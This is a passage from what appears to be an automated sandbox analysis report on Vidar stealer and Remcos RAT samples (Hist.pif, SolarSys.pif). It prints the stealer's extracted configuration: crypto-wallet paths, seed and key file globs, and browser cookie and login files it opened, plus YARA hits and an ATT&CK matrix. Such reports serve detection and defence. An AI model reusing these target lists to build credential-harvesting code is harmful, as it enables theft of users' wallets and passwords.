Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.wallet|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.config|0|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Chia Wallet|2|\.chia\mainnet\config\|*.*|0|Chia Wallet|2|\.chia\mainnet\run\|*.*|0|Chia Wallet|2|\.chia\mainnet\wallet\|*.sqlite|0|Komodo Wallet (Atomic)\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet (Atomic)\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
                    Source: Hist.pif, 0000000B.00000002.3073627250.0000000004D65000.00000040.00001000.00020000.00000000.sdmpString found in binary or memory: |1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus|1|\Exodus\exodus.wallet\|info.seco|0|Exodus|1|\Exodus\backups\|*.*|1|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.wallet|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.config|0|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Chia Wallet|2|\.chia\mainnet\config\|*.*|0|Chia Wallet|2|\.chia\mainnet\run\|*.*|0|Chia Wallet|2|\.chia\mainnet\wallet\|*.sqlite|0|Komodo Wallet (Atomic)\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet (Atomic)\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
                    Source: Hist.pif, 0000000B.00000002.3073627250.0000000004D65000.00000040.00001000.00020000.00000000.sdmpString found in binary or memory: o*.*,*coin*.*,*private*.*,*2fa*.*,*auth*.*,*ledger*.*,*trezor*.*,*pass*.*,*wal*.*,*upbit*.*,*bcex*.*,*bithimb*.*,*hitbtc*.*,*bitflyer*.*,*kucoin*.*,*huobi*.*,*poloniex*.*,*kraken*.*,*okex*.*,*binance*.*,*bitfinex*.*,*gdax*.*,*ethereum*.*,*exodus*.*,*metamask*.*,*myetherwallet*.*,*electrum*.*,*bitcoin*.*,*blockchain*.*,*coinomi*.*,*words*.*,*meta*.*,*mask*.*,*eth*.*,*recovery*.*|150|2|*Windows*,*Program Files*,*Program Files (x86)*,*AppData*,*ProgramData*,*.lnk,*.exe,*.scr,*.com,*.pif,*.mp3|Flash|%DRIVE_REMOVABLE%\|*wallet*.*,*seed*.*,*btc*.*,*key*.*,*2fa*.*,*crypto*.*,*coin*.*,*private*.*,*2fa*.*,*auth*.*,*ledger*.*,*trezor*.*,*pass*.*,*wal*.*,*upbit*.*,*bcex*.*,*bithimb*.*,*hitbtc*.*,*bitflyer*.*,*kucoin*.*,*huobi*.*,*poloniex*.*,*kraken*.*,*okex*.*,*binance*.*,*bitfinex*.*,*gdax*.*,*ethereum*.*,*exodus*.*,*metamask*.*,*myetherwallet*.*,*electrum*.*,*bitcoin*.*,*blockchain*.*,*coinomi*.*,*words*.*,*meta*.*,*mask*.*,*eth*.*,*recovery*.*|150|3|*windows*,*Program Files*,*Program Files (x86)*,*AppData*,*ProgramData*,*.lnk,*.exe,*.scr,*.com,*.pif,*.mp3|
                    Source: Hist.pif, 0000000B.00000002.3073627250.0000000004D65000.00000040.00001000.00020000.00000000.sdmpString found in binary or memory: o*.*,*coin*.*,*private*.*,*2fa*.*,*auth*.*,*ledger*.*,*trezor*.*,*pass*.*,*wal*.*,*upbit*.*,*bcex*.*,*bithimb*.*,*hitbtc*.*,*bitflyer*.*,*kucoin*.*,*huobi*.*,*poloniex*.*,*kraken*.*,*okex*.*,*binance*.*,*bitfinex*.*,*gdax*.*,*ethereum*.*,*exodus*.*,*metamask*.*,*myetherwallet*.*,*electrum*.*,*bitcoin*.*,*blockchain*.*,*coinomi*.*,*words*.*,*meta*.*,*mask*.*,*eth*.*,*recovery*.*|150|2|*Windows*,*Program Files*,*Program Files (x86)*,*AppData*,*ProgramData*,*.lnk,*.exe,*.scr,*.com,*.pif,*.mp3|Flash|%DRIVE_REMOVABLE%\|*wallet*.*,*seed*.*,*btc*.*,*key*.*,*2fa*.*,*crypto*.*,*coin*.*,*private*.*,*2fa*.*,*auth*.*,*ledger*.*,*trezor*.*,*pass*.*,*wal*.*,*upbit*.*,*bcex*.*,*bithimb*.*,*hitbtc*.*,*bitflyer*.*,*kucoin*.*,*huobi*.*,*poloniex*.*,*kraken*.*,*okex*.*,*binance*.*,*bitfinex*.*,*gdax*.*,*ethereum*.*,*exodus*.*,*metamask*.*,*myetherwallet*.*,*electrum*.*,*bitcoin*.*,*blockchain*.*,*coinomi*.*,*words*.*,*meta*.*,*mask*.*,*eth*.*,*recovery*.*|150|3|*windows*,*Program Files*,*Program Files (x86)*,*AppData*,*ProgramData*,*.lnk,*.exe,*.scr,*.com,*.pif,*.mp3|
                    Source: Hist.pif, 0000000B.00000002.3073627250.0000000004D65000.00000040.00001000.00020000.00000000.sdmpString found in binary or memory: \Coinomi\Coinomi\wallets\
                    Source: Hist.pif, 0000000B.00000002.3073627250.0000000004D65000.00000040.00001000.00020000.00000000.sdmpString found in binary or memory: |1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus|1|\Exodus\exodus.wallet\|info.seco|0|Exodus|1|\Exodus\backups\|*.*|1|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.wallet|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.config|0|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Chia Wallet|2|\.chia\mainnet\config\|*.*|0|Chia Wallet|2|\.chia\mainnet\run\|*.*|0|Chia Wallet|2|\.chia\mainnet\wallet\|*.sqlite|0|Komodo Wallet (Atomic)\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet (Atomic)\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
                    Source: Hist.pif, 0000000B.00000002.3073627250.0000000004D65000.00000040.00001000.00020000.00000000.sdmpString found in binary or memory: |1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus|1|\Exodus\exodus.wallet\|info.seco|0|Exodus|1|\Exodus\backups\|*.*|1|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.wallet|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.config|0|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Chia Wallet|2|\.chia\mainnet\config\|*.*|0|Chia Wallet|2|\.chia\mainnet\run\|*.*|0|Chia Wallet|2|\.chia\mainnet\wallet\|*.sqlite|0|Komodo Wallet (Atomic)\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet (Atomic)\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
                    Source: Hist.pif, 0000000B.00000002.3073627250.0000000004D65000.00000040.00001000.00020000.00000000.sdmpString found in binary or memory: |1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus|1|\Exodus\exodus.wallet\|info.seco|0|Exodus|1|\Exodus\backups\|*.*|1|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.wallet|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.config|0|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Chia Wallet|2|\.chia\mainnet\config\|*.*|0|Chia Wallet|2|\.chia\mainnet\run\|*.*|0|Chia Wallet|2|\.chia\mainnet\wallet\|*.sqlite|0|Komodo Wallet (Atomic)\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet (Atomic)\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
                    Source: Hist.pif, 0000000B.00000002.3073627250.0000000004D65000.00000040.00001000.00020000.00000000.sdmpString found in binary or memory: |1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus|1|\Exodus\exodus.wallet\|info.seco|0|Exodus|1|\Exodus\backups\|*.*|1|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.wallet|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.config|0|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Chia Wallet|2|\.chia\mainnet\config\|*.*|0|Chia Wallet|2|\.chia\mainnet\run\|*.*|0|Chia Wallet|2|\.chia\mainnet\wallet\|*.sqlite|0|Komodo Wallet (Atomic)\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet (Atomic)\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
                    Source: Hist.pif, 0000000B.00000002.3073627250.0000000004D65000.00000040.00001000.00020000.00000000.sdmpString found in binary or memory: |1|\Raven\|*wallet*.dat|0|Daedalus Mainnet|1|\Daedalus Mainnet\wallets\|she*.sqlite|0|Blockstream Green|1|\Blockstream\Green\wallets\|*.*|1|Wasabi Wallet|1|\WalletWasabi\Client\Wallets\|*.json|0|Ethereum|1|\Ethereum\|keystore|0|Electrum|1|\Electrum\wallets\|*.*|0|ElectrumLTC|1|\Electrum-LTC\wallets\|*.*|0|Exodus|1|\Exodus\|exodus.conf.json|0|Exodus|1|\Exodus\|window-state.json|0|Exodus|1|\Exodus\exodus.wallet\|passphrase.json|0|Exodus|1|\Exodus\exodus.wallet\|seed.seco|0|Exodus|1|\Exodus\exodus.wallet\|info.seco|0|Exodus|1|\Exodus\backups\|*.*|1|Electron Cash|1|\ElectronCash\wallets\|*.*|0|MultiDoge|1|\MultiDoge\|multidoge.wallet|0|Atomic|1|\atomic\Local Storage\leveldb\|*.*|0|Binance|1|\Binance\|app-store.json|0|Binance|1|\Binance\|simple-storage.json|0|Binance|1|\Binance\|.finger-print.fp|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.wallet|0|Coinomi|0|\Coinomi\Coinomi\wallets\|*.config|0|Ledger Live\Local Storage\leveldb|1|\Ledger Live\Local Storage\leveldb\|*.*|0|Ledger Live\Session Storage|1|\Ledger Live\Session Storage\|*.*|0|Ledger Live|1|\Ledger Live\|*.*|0|Chia Wallet|2|\.chia\mainnet\config\|*.*|0|Chia Wallet|2|\.chia\mainnet\run\|*.*|0|Chia Wallet|2|\.chia\mainnet\wallet\|*.sqlite|0|Komodo Wallet (Atomic)\config|1|\atomic_qt\config\|*.*|0|Komodo Wallet (Atomic)\exports|1|\atomic_qt\exports\|*.*|0|Guarda Desktop\IndexedDB\https_guarda.co_0.indexeddb.leveldb|1|\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\|*.*|0|Guarda Desktop\Local Storage\leveldb|1|\Guarda\Local Storage\leveldb\|*.*|0|
                    Tries to harvest and steal browser information (history, passwords, etc)
                    Source: C:\Users\user\AppData\Local\Temp\787041\Hist.pifFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\cookies.sqliteJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\787041\Hist.pifFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\HistoryJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\787041\Hist.pifFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\places.sqliteJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\787041\Hist.pifFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\prefs.jsJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\787041\Hist.pifFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\HistoryJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\787041\Hist.pifFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\787041\Hist.pifFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\787041\Hist.pifFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\787041\Hist.pifFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\787041\Hist.pifFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\CookiesJump to behavior
                    Tries to harvest and steal ftp login credentials
                    Source: C:\Users\user\AppData\Local\Temp\787041\Hist.pifFile opened: C:\Users\user\AppData\Roaming\FileZilla\recentservers.xmlJump to behavior
                    Tries to steal Crypto Currency Wallets
                    Source: C:\Users\user\AppData\Local\Temp\787041\Hist.pifFile opened: C:\Users\user\AppData\Roaming\Bitcoin\wallets\Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\787041\Hist.pifFile opened: C:\Users\user\AppData\Roaming\Electrum\wallets\Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\787041\Hist.pifFile opened: C:\Users\user\AppData\Roaming\Electrum\wallets\Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\787041\Hist.pifFile opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets\Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\787041\Hist.pifFile opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets\Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\787041\Hist.pifFile opened: C:\Users\user\AppData\Roaming\Exodus\Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\787041\Hist.pifFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\787041\Hist.pifFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\787041\Hist.pifFile opened: C:\Users\user\AppData\Roaming\Exodus\backups\Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\787041\Hist.pifFile opened: C:\Users\user\AppData\Roaming\ElectronCash\wallets\Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\787041\Hist.pifFile opened: C:\Users\user\AppData\Roaming\MultiDoge\Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\787041\Hist.pifFile opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldb\Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\787041\Hist.pifFile opened: C:\Users\user\AppData\Roaming\Binance\Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\787041\Hist.pifFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets\Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\787041\Hist.pifFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets\Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\787041\Hist.pifFile opened: C:\Users\user\AppData\Roaming\Ledger Live\Local Storage\leveldb\Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\787041\Hist.pifFile opened: C:\Users\user\AppData\Roaming\Ledger Live\Session Storage\Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\787041\Hist.pifFile opened: C:\Users\user\AppData\Roaming\Ledger Live\Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\787041\Hist.pifFile opened: C:\Users\user\AppData\Roaming\atomic_qt\config\Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\787041\Hist.pifFile opened: C:\Users\user\AppData\Roaming\atomic_qt\exports\Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\787041\Hist.pifFile opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\787041\Hist.pifFile opened: C:\Users\user\AppData\Roaming\Guarda\Local Storage\leveldb\Jump to behavior
                    Source: SolarSys.pifBinary or memory string: WIN_81
                    Source: SolarSys.pifBinary or memory string: WIN_XP
                    Source: SolarSys.pifBinary or memory string: WIN_XPe
                    Source: Hist.pif.2.drBinary or memory string: %.3d%S%M%H%m%Y%jX86IA64X64WIN32_NTWIN_10WIN_2016WIN_81WIN_2012R2WIN_2012WIN_8WIN_2008R2WIN_7WIN_2008WIN_VISTAWIN_2003WIN_XPeWIN_XPInstallLanguageSYSTEM\CurrentControlSet\Control\Nls\LanguageSchemeLangIDControl Panel\Appearance3, 3, 14, 2USERPROFILEUSERDOMAINUSERDNSDOMAINGetSystemWow64DirectoryWSeDebugPrivilege:winapistdcallubyteP
                    Source: SolarSys.pifBinary or memory string: WIN_VISTA
                    Source: SolarSys.pifBinary or memory string: WIN_7
                    Source: SolarSys.pifBinary or memory string: WIN_8
                    Source: Yara matchFile source: 0000000B.00000002.3073627250.0000000004D65000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000000B.00000002.3072148698.00000000015DF000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: Hist.pif PID: 4368, type: MEMORYSTR

                    Remote Access Functionality

                    barindex
                    Detected Remcos RAT
                    Source: C:\Users\user\AppData\Local\Temp\661592\Bk.pifMutex created: \Sessions\1\BaseNamedObjects\Rmc-6MRD2P
                    Yara detected Vidar
                    Source: Yara matchFile source: sslproxydump.pcap, type: PCAP
                    Yara detected Vidar stealer
                    Source: Yara matchFile source: 11.2.Hist.pif.4d20000.5.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 11.2.Hist.pif.4953a50.4.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 11.2.Hist.pif.4953a50.4.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0000000B.00000003.2555154837.0000000004954000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000000B.00000002.3073354525.0000000004920000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000000B.00000002.3072722051.0000000004620000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000000B.00000003.2555196577.0000000004D28000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000000B.00000002.3072848236.00000000046A4000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000000B.00000002.3073354525.0000000004953000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000000B.00000002.3073627250.0000000004D21000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000000B.00000003.2555073817.00000000046A5000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000000B.00000003.2555115715.00000000015D6000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: Hist.pif PID: 4368, type: MEMORYSTR
                    Source: C:\Users\user\AppData\Local\Temp\787041\Hist.pifCode function: 11_2_00096733 socket,WSAGetLastError,bind,listen,WSAGetLastError,closesocket,11_2_00096733
                    Source: C:\Users\user\AppData\Local\Temp\787041\Hist.pifCode function: 11_2_00096BF7 socket,WSAGetLastError,bind,WSAGetLastError,closesocket,11_2_00096BF7
                    Source: C:\Users\user\AppData\Local\SunCraft Innovations\SolarSys.pifCode function: 38_2_003B6733 socket,WSAGetLastError,bind,listen,WSAGetLastError,closesocket,38_2_003B6733
                    Source: C:\Users\user\AppData\Local\SunCraft Innovations\SolarSys.pifCode function: 38_2_003B6BF7 socket,WSAGetLastError,bind,WSAGetLastError,closesocket,38_2_003B6BF7

                    Mitre Att&ck Matrix

                    ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                    Gather Victim Identity Information11
                    Scripting                    		2
                    Valid Accounts                    		11
                    Windows Management Instrumentation                    		11
                    Scripting                    		1
                    Exploitation for Privilege Escalation                    		1
                    Disable or Modify Tools                    		2
                    OS Credential Dumping                    		2
                    System Time Discovery                    		Remote Services1
                    Archive Collected Data                    		12
                    Ingress Tool Transfer                    		Exfiltration Over Other Network Medium1
                    System Shutdown/Reboot
                    CredentialsDomainsDefault Accounts2
                    Native API                    		1
                    DLL Side-Loading                    		1
                    DLL Side-Loading                    		1
                    Deobfuscate/Decode Files or Information                    		21
                    Input Capture                    		1
                    Account Discovery                    		Remote Desktop Protocol4
                    Data from Local System                    		11
                    Encrypted Channel                    		Exfiltration Over BluetoothNetwork Denial of Service
                    Email AddressesDNS ServerDomain Accounts1
                    Scheduled Task/Job                    		2
                    Valid Accounts                    		2
                    Valid Accounts                    		2
                    Obfuscated Files or Information                    		Security Account Manager3
                    File and Directory Discovery                    		SMB/Windows Admin Shares21
                    Input Capture                    		1
                    Non-Standard Port                    		Automated ExfiltrationData Encrypted for Impact
                    Employee NamesVirtual Private ServerLocal AccountsCron1
                    Scheduled Task/Job                    		21
                    Access Token Manipulation                    		1
                    DLL Side-Loading                    		NTDS28
                    System Information Discovery                    		Distributed Component Object Model3
                    Clipboard Data                    		1
                    Remote Access Software                    		Traffic DuplicationData Destruction
                    Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon Script12
                    Process Injection                    		11
                    Masquerading                    		LSA Secrets151
                    Security Software Discovery                    		SSHKeylogging3
                    Non-Application Layer Protocol                    		Scheduled TransferData Encrypted for Impact
                    Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC Scripts1
                    Scheduled Task/Job                    		2
                    Valid Accounts                    		Cached Domain Credentials1
                    Virtualization/Sandbox Evasion                    		VNCGUI Input Capture124
                    Application Layer Protocol                    		Data Transfer Size LimitsService Stop
                    DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items1
                    Virtualization/Sandbox Evasion                    		DCSync4
                    Process Discovery                    		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                    Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job21
                    Access Token Manipulation                    		Proc Filesystem1
                    Application Window Discovery                    		Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                    Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt12
                    Process Injection                    		/etc/passwd and /etc/shadow1
                    System Owner/User Discovery                    		Direct Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement

                    Behavior Graph

                    Hide Legend

                    Legend:

                    • Process
                    • Signature
                    • Created File
                    • DNS/IP Info
                    • Is Dropped
                    • Is Windows Process
                    • Number of created Registry Values
                    • Number of created Files
                    • Visual Basic
                    • Delphi
                    • Java
                    • .Net C# or VB.NET
                    • C, C++ or other language
                    • Is malicious
                    • Internet
